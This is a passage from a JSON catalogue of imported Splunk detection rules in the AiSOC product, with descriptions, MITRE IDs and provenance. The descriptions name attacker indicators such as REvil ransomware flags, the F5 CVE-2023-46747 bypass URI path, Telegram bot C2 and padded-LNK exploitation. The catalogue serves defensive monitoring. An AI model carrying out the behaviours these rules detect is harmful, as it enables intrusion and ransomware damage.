"AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-suspicious-behavior-alert.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "85c7555a-05af-4322-81aa-76b4ddf52baa", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_suspicious_behavior_alert.yml" } }, { "id": "splunk-security-content-85e88c80-e4ee-4c65-b02e-3c54d94c7a51", "type": "detection", "name": "Windows Wmic DiskDrive Discovery", "description": "The following analytic detects the use of Windows Management Instrumentation Command-line (WMIC) for disk drive discovery activities on a Windows system. This process involves monitoring commands such as \u201cwmic diskdrive\u201d which are often used by administrators for inventory and diagnostics but can also be leveraged by attackers to enumerate hardware details for malicious purposes. Detecting these commands is essential for identifying potentially unauthorized asset reconnaissance or pre-attack mapping behaviors. By capturing and analyzing WMIC disk drive queries, security teams can gain visibility into suspicious activities, enabling them to respond promptly and strengthen the organization\u2019s security posture against insider threats or lateral movement attempts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-wmic-diskdrive-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "85e88c80-e4ee-4c65-b02e-3c54d94c7a51", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_wmic_diskdrive_discovery.yml" } }, { "id": "splunk-security-content-85facebe-c382-11eb-9c3e-acde48001122", "type": "detection", "name": "Revil Common Exec Parameter", "description": "The following analytic detects the execution of command-line parameters commonly associated with REVIL ransomware, such as \"-nolan\", \"-nolocal\", \"-fast\", and \"-full\". It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs mapped to the `Processes` node of the `Endpoint` data model. This activity is significant because these parameters are indicative of ransomware attempting to encrypt files on a compromised machine. If confirmed malicious, this could lead to widespread data encryption, rendering critical files inaccessible and potentially causing significant operational disruption.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/revil-common-exec-parameter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "85facebe-c382-11eb-9c3e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/revil_common_exec_parameter.yml" } }, { "id": "splunk-security-content-85fae8fa-0427-11ec-8b78-acde48001122", "type": "detection", "name": "GetLocalUser with PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with the `Get-LocalUser` commandlet, which is used to query local user accounts. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. Monitoring this activity is significant because adversaries and Red Teams may use it to enumerate local users for situational awareness and Active Directory discovery. If confirmed malicious, this activity could allow attackers to identify potential targets for further exploitation or privilege escalation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getlocaluser-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "85fae8fa-0427-11ec-8b78-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getlocaluser_with_powershell.yml" } }, { "id": "splunk-security-content-860902fd-2e76-46b3-b050-ba548dab576c", "type": "detection", "name": "Azure Automation Account Created", "description": "The following analytic detects the creation of a new Azure Automation account within an Azure tenant. It leverages Azure Audit events, specifically the Azure Activity log category, to identify when an account is created or updated. This activity is significant because Azure Automation accounts can be used to automate tasks and orchestrate actions across Azure and on-premise environments. If an attacker creates an Automation account with elevated privileges, they could maintain persistence, execute malicious runbooks, and potentially escalate privileges or execute code on virtual machines, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-automation-account-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "860902fd-2e76-46b3-b050-ba548dab576c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_automation_account_created.yml" } }, { "id": "splunk-security-content-8630aa22-042b-11ec-af39-acde48001122", "type": "detection", "name": "Gsuite Email With Known Abuse Web Service Link", "description": "The following analytic detects emails in Gsuite containing links to known abuse web services such as Pastebin, Telegram, and Discord. It leverages Gsuite Gmail logs to identify emails with these specific domains in their links. This activity is significant because these services are commonly used by attackers to deliver malicious payloads. If confirmed malicious, this could lead to the delivery of malware, phishing attacks, or other harmful activities, potentially compromising sensitive information or systems within the organization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gsuite-email-with-known-abuse-web-service-link.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8630aa22-042b-11ec-af39-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gsuite_email_with_known_abuse_web_service_link.yml" } }, { "id": "splunk-security-content-868ee0e4-52ab-484a-833a-6d85b7c028d0", "type": "detection", "name": "GetDomainController with PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with the `Get-DomainController` command, which is used to discover remote systems within a Windows domain. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. Monitoring this activity is crucial as it may indicate an attempt to enumerate domain controllers, a common tactic in Active Directory discovery. If confirmed malicious, this activity could allow attackers to gain situational awareness, potentially leading to further exploitation and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getdomaincontroller-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "868ee0e4-52ab-484a-833a-6d85b7c028d0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getdomaincontroller_with_powershell.yml" } }, { "id": "splunk-security-content-868f3131-d5e1-4bf1-af5b-9b0fbaaaedbb", "type": "detection", "name": "O365 Privileged Graph API Permission Assigned", "description": "The following analytic detects the assignment of critical Graph API permissions in Azure AD using the O365 Unified Audit Log. It focuses on permissions such as Application.ReadWrite.All, AppRoleAssignment.ReadWrite.All, and RoleManagement.ReadWrite.Directory. The detection method leverages Azure Active Directory workload events, specifically 'Update application' operations. This activity is significant as these permissions provide extensive control over Azure AD settings, posing a high risk if misused. If confirmed malicious, this could allow unauthorized modifications, leading to potential data breaches or privilege escalation. Immediate investigation is crucial.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-privileged-graph-api-permission-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "868f3131-d5e1-4bf1-af5b-9b0fbaaaedbb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_privileged_graph_api_permission_assigned.yml" } }, { "id": "splunk-security-content-869ba261-c272-47d7-affe-5c0aa85c93d6", "type": "detection", "name": "Headless Browser Usage", "description": "The following analytic detects the usage of headless browsers within an organization. It identifies processes containing the \"--headless\" and \"--disable-gpu\" command line arguments, which are indicative of headless browsing. This detection leverages data from the Endpoint.Processes datamodel to identify such processes. Monitoring headless browser usage is significant as these tools can be exploited by adversaries for malicious activities like web scraping, automated testing, and undetected web interactions. If confirmed malicious, this activity could lead to unauthorized data extraction, automated attacks, or other covert operations on web applications.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1497", "T1564.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/headless-browser-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "869ba261-c272-47d7-affe-5c0aa85c93d6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/headless_browser_usage.yml" } }, { "id": "splunk-security-content-86a5b949-679b-4197-8d4c-9c180a818c45", "type": "detection", "name": "Windows Network Connection Discovery Via Net", "description": "The following analytic identifies the execution of `net.exe` with command-line arguments used to list or display information about computer connections. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity can be significant as it indicates potential network reconnaissance by adversaries or Red Teams, aiming to gather situational awareness and Active Directory information. If confirmed malicious, this behavior could allow attackers to map the network, identify critical assets, and plan further attacks, potentially leading to data exfiltration or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1049" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-network-connection-discovery-via-net.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "86a5b949-679b-4197-8d4c-9c180a818c45", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_network_connection_discovery_via_net.yml" } }, { "id": "splunk-security-content-86dc8176-6e6c-42d6-9684-5444c6557ab3", "type": "detection", "name": "Windows PowerView Constrained Delegation Discovery", "description": "The following analytic detects the use of PowerView commandlets to discover Windows endpoints with Kerberos Constrained Delegation. It leverages PowerShell Script Block Logging (EventCode=4104) to identify specific commandlets like `Get-DomainComputer` or `Get-NetComputer` with the `-TrustedToAuth` parameter. This activity is significant as it indicates potential reconnaissance efforts by adversaries or Red Teams to map out privileged delegation settings in Active Directory. If confirmed malicious, this could allow attackers to identify high-value targets for further exploitation, potentially leading to privilege escalation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powerview-constrained-delegation-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "86dc8176-6e6c-42d6-9684-5444c6557ab3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powerview_constrained_delegation_discovery.yml" } }, { "id": "splunk-security-content-86f66f44-94d9-412d-a71d-5d8ed0fef72e", "type": "detection", "name": "Windows DNS Query Request by Telegram Bot API", "description": "The following analytic detects the execution of a DNS query by a process to the associated Telegram API domain, which could indicate access via a Telegram bot commonly used by malware for command and control (C2) communications. By monitoring DNS queries related to Telegram's infrastructure, the detection identifies potential attempts to establish covert communication channels between a compromised system and external malicious actors. This behavior is often observed in cyberattacks where Telegram bots are used to receive commands or exfiltrate data, making it a key indicator of suspicious or malicious activity within a network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.004", "T1102.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-dns-query-request-by-telegram-bot-api.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "86f66f44-94d9-412d-a71d-5d8ed0fef72e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/windows_dns_query_request_by_telegram_bot_api.yml" } }, { "id": "splunk-security-content-8728d224-9cd5-4aa7-b75f-f8520a569979", "type": "detection", "name": "Cisco Duo Set User Status to Bypass 2FA", "description": "The following analytic detects instances where a Duo user's status is changed to \"Bypass\" for 2FA, specifically when the\nprevious status was \"Active.\" This behavior is identified by analyzing Duo activity logs for user update actions, extracting\nthe status transitions, and filtering for cases where a user is set to bypass multi-factor authentication. This is a critical\nevent for a Security Operations Center (SOC) to monitor, as bypassing 2FA significantly weakens account security and may\nindicate malicious insider activity or account compromise. Attackers or unauthorized administrators may exploit this change to\ndisable strong authentication controls, increasing the risk of unauthorized access to sensitive systems and data. Early detection\nof such changes enables rapid investigation and response, helping to prevent potential breaches and limit the impact of\ncredential-based attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-set-user-status-to-bypass-2fa.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8728d224-9cd5-4aa7-b75f-f8520a569979", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_set_user_status_to_bypass_2fa.yml" } }, { "id": "splunk-security-content-872e3063-0fc4-4e68-b2f3-f2b99184a708", "type": "detection", "name": "GetAdGroup with PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with the `Get-AdGroup` commandlet, which is used to query domain groups in a Windows Domain. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. Monitoring this activity is crucial as it may indicate an adversary or Red Team enumerating domain groups for situational awareness and Active Directory discovery. If confirmed malicious, this activity could lead to further reconnaissance, privilege escalation, or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getadgroup-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "872e3063-0fc4-4e68-b2f3-f2b99184a708", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getadgroup_with_powershell.yml" } }, { "id": "splunk-security-content-875de3d7-09bc-4916-8c0a-0929f4ced3d8", "type": "detection", "name": "Azure AD Block User Consent For Risky Apps Disabled", "description": "The following analytic detects when the risk-based step-up consent security setting in Azure AD is disabled. It monitors Azure Active Directory logs for the \"Update authorization policy\" operation, specifically changes to the \"AllowUserConsentForRiskyApps\" setting. This activity is significant because disabling this feature can expose the organization to OAuth phishing threats by allowing users to grant consent to potentially malicious applications. If confirmed malicious, attackers could gain unauthorized access to user data and sensitive information, leading to data breaches and further compromise within the organization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-block-user-consent-for-risky-apps-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "875de3d7-09bc-4916-8c0a-0929f4ced3d8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_block_user_consent_for_risky_apps_disabled.yml" } }, { "id": "splunk-security-content-8775fcf3-05e4-4525-bba2-a56e39d8d050", "type": "detection", "name": "Windows Explorer LNK Exploit Process Launch With Padding", "description": "This detection identifies instances where Windows Explorer.exe spawns PowerShell or cmd.exe processes with abnormally large padding (50 or more spaces) in the command line. This specific pattern is a key indicator of the ZDI-CAN-25373 Windows shortcut zero-day vulnerability exploitation, where threat actors craft malicious LNK files containing padded content to trigger code execution. The excessive spacing in the command line is used to manipulate the way Windows processes the shortcut file, enabling arbitrary code execution. This technique has been actively exploited by multiple APT groups in targeted attacks, with malicious LNK files being delivered through both HTTP and SMB protocols. The presence of significant command line padding when Explorer.exe launches command shells is highly suspicious and warrants immediate investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-explorer-lnk-exploit-process-launch-with-padding.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8775fcf3-05e4-4525-bba2-a56e39d8d050", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_explorer_lnk_exploit_process_launch_with_padding.yml" } }, { "id": "splunk-security-content-879c4330-b3e0-11eb-b1b1-acde48001122", "type": "detection", "name": "SLUI Spawning a Process", "description": "The following analytic detects the Microsoft Software Licensing User Interface Tool (`slui.exe`) spawning a child process. This behavior is identified using Endpoint Detection and Response (EDR) telemetry, focusing on process creation events where `slui.exe` is the parent process. This activity is significant because `slui.exe` should not typically spawn child processes, and doing so may indicate a UAC bypass attempt, leading to elevated privileges. If confirmed malicious, an attacker could leverage this to execute code with elevated privileges, potentially compromising the system's security and gaining unauthorized access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/slui-spawning-a-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "879c4330-b3e0-11eb-b1b1-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/slui_spawning_a_process.yml" } }, { "id": "splunk-security-content-87ac670e-bbfd-44ca-b566-44e9f835518d", "type": "detection", "name": "Steal or Forge Authentication Certificates Behavior Identified", "description": "The following analytic identifies potential threats related to the theft or forgery of authentication certificates. It detects when five or more analytics from the Windows Certificate Services story trigger within a specified timeframe. This detection leverages aggregated risk scores and event counts from the Risk data model. This activity is significant as it may indicate an ongoing attack aimed at compromising authentication mechanisms. If confirmed malicious, attackers could gain unauthorized access to sensitive systems and data, potentially leading to severe security breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/steal-or-forge-authentication-certificates-behavior-identified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "87ac670e-bbfd-44ca-b566-44e9f835518d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/steal_or_forge_authentication_certificates_behavior_identified.yml" } }, { "id": "splunk-security-content-88103f56-8f5c-411f-a87f-71bee776f140", "type": "detection", "name": "Windows Chromium Browser Launched with Small Window Size", "description": "The following analytic detects instances where a Chromium-based browser process, including Chrome, Edge, Brave, Opera, or Vivaldi, is launched with an unusually small window size, typically less than 100 pixels in width or height. Such configurations render the browser effectively invisible to the user and are uncommon in normal user activity. When observed on endpoints, especially in combination with automation, off-screen positioning, or suppression flags, this behavior may indicate attempts to execute web content or automated actions stealthily, bypassing user interaction and security controls. This analytic highlights potential malicious automation or covert browser-based activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1497" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-chromium-browser-launched-with-small-window-size.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "88103f56-8f5c-411f-a87f-71bee776f140", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_chromium_browser_launched_with_small_window_size.yml" } }, { "id": "splunk-security-content-884a5f59-eec7-4f4a-948b-dbde18225fdc", "type": "detection", "name": "AWS Detect Users with KMS keys performing encryption S3", "description": "The following analytic identifies users with KMS keys performing encryption operations on S3 buckets. It leverages AWS CloudTrail logs to detect the `CopyObject` event where server-side encryption with AWS KMS is specified. This activity is significant as it may indicate unauthorized or suspicious encryption of data, potentially masking exfiltration or tampering efforts. If confirmed malicious, an attacker could be encrypting sensitive data to evade detection or preparing it for exfiltration, posing a significant risk to data integrity and confidentiality.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-detect-users-with-kms-keys-performing-encryption-s3.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "884a5f59-eec7-4f4a-948b-dbde18225fdc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_detect_users_with_kms_keys_performing_encryption_s3.yml" } }, { "id": "splunk-security-content-885ea672-07ee-475a-879e-60d28aa5dd42", "type": "detection", "name": "Detect Remote Access Software Usage Traffic", "description": "The following analytic detects network traffic associated with known remote access software applications, such as AnyDesk, GoToMyPC, LogMeIn, and TeamViewer.\nIt leverages Palo Alto traffic logs mapped to the Network_Traffic data model in Splunk. This activity is significant because adversaries often use remote access tools to maintain unauthorized access to compromised environments.\nIf confirmed malicious, this activity could allow attackers to control systems remotely, exfiltrate data, or deploy additional malware, posing a severe threat to the organization's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-remote-access-software-usage-traffic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "885ea672-07ee-475a-879e-60d28aa5dd42", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_remote_access_software_usage_traffic.yml" } }, { "id": "splunk-security-content-886a8f46-d7e2-4439-b9ba-aec238e31732", "type": "detection", "name": "ASL AWS ECR Container Upload Unknown User", "description": "The following analytic detects unauthorized container uploads to AWS Elastic Container Service (ECR) by monitoring AWS CloudTrail events. It identifies instances where a new container is uploaded by a user not previously recognized as authorized. This detection is crucial for a SOC as it can indicate a potential compromise or misuse of AWS ECR, which could lead to unauthorized access to sensitive data or the deployment of malicious containers. By identifying and investigating these events, organizations can mitigate the risk of data breaches or other security incidents resulting from unauthorized container uploads. The impact of such an attack could be significant, compromising the integrity and security of the organization's cloud environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-ecr-container-upload-unknown-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "886a8f46-d7e2-4439-b9ba-aec238e31732", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_ecr_container_upload_unknown_user.yml" } }, { "id": "splunk-security-content-886c7e51-2ea1-425d-8705-faaca5a64cc6", "type": "detection", "name": "Kubernetes Anomalous Traffic on Network Edge", "description": "The following analytic identifies anomalous network traffic volumes between Kubernetes workloads or between a workload and external sources. It leverages Network Performance Monitoring metrics collected via an OTEL collector and pulled from Splunk Observability Cloud. The detection compares recent network metrics (tcp.bytes, tcp.new_sockets, tcp.packets, udp.bytes, udp.packets) over the last hour with the average over the past 30 days to identify significant deviations. This activity is significant as unexpected spikes may indicate unauthorized data transfers or lateral movement. If confirmed malicious, it could lead to data exfiltration or compromise of additional services, potentially resulting in data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-anomalous-traffic-on-network-edge.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "886c7e51-2ea1-425d-8705-faaca5a64cc6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_anomalous_traffic_on_network_edge.yml" } }, { "id": "splunk-security-content-88bf127c-613e-4579-99e4-c4d4b02f3840", "type": "detection", "name": "F5 TMUI Authentication Bypass", "description": "The following analytic detects attempts to exploit the CVE-2023-46747 vulnerability, an authentication bypass flaw in F5 BIG-IP's Configuration utility (TMUI). It identifies this activity by monitoring for specific URI paths such as \"*/mgmt/tm/auth/user/*\" with the PATCH method and a 200 status code. This behavior is significant for a SOC as it indicates potential unauthorized access attempts, leading to remote code execution. If confirmed malicious, an attacker could gain unauthorized access, execute arbitrary code, steal data, disrupt systems, or conduct further malicious activities within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/f5-tmui-authentication-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "88bf127c-613e-4579-99e4-c4d4b02f3840", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": 